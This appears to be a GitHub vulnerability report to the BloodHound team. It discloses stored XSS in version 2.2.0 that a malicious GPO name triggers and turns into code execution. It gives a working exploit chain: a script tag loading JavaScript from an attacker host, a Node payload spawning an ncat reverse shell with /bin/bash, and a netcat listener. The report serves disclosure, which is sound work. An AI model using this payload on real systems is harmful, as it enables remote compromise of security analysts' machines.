Code execution in Bloodhound via malicious AD Object #267
Description
Dear Bloodhound Team –
I identified a way to achieve code execution in Bloodhound 2.2.0 by creating a GPO with a name containing JavaScript code that will trigger in Bloodhound's search-autocomplete function. The injected JavaScript is not only a valid xss but also allows the creation of a child process.
The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat:
-
Create a GPO with the following name:
aaaaaa<SCRIPT SRC="http://<attacker host>:<some port>/poc.js"> -
Run Sharphound
Invoke-BloodHound -Stealth -
Import collected data
-
Host the following js payload as POC.JS (all uppercase is important here since the sharphound output json always has the value for the name field in upper case)
const { spawn } = require('child_process');
spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);
e.g. with python -m SimpleHTTPServer <some port>
-
Start listener
nc -v -l -p <some port> -
Search for "aa" in Bloodhound and catch the shell
I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than "aaaaa" and I also would not consider JavaScript as one of my strengths but I hope I could prove my point here :)
I also made a video
